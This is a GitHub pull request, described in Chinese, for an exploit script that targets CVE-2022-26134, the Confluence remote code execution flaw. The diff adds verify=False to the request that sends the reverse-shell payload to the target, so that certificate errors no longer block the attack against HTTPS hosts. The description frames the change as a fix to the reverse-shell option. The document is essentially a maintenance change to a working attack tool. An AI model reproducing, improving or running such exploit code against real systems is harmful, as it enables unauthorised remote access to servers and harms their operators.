### PR TITLE
修复反弹shell时证书问题

### DIFF
--- a/cve2022-26134exp.py
+++ b/cve2022-26134exp.py
@@ -71,7 +71,7 @@ if __name__ == "__main__":
             target = args.url
             ip = args.lhost
             port = args.lport
-            e = requests.get(target + shell())
+            e = requests.get(target + shell(), verify=False)
             if e.status_code == 200 or e.status_code == 302:
                     print("[+] exploit success")
             else:


### PR DESCRIPTION
修复反弹shell -i 参数时，出现的https证书问题
![image](https://user-images.githubusercontent.com/45556496/174554833-0a4dec03-05c4-453a-9855-549a38616282.png)
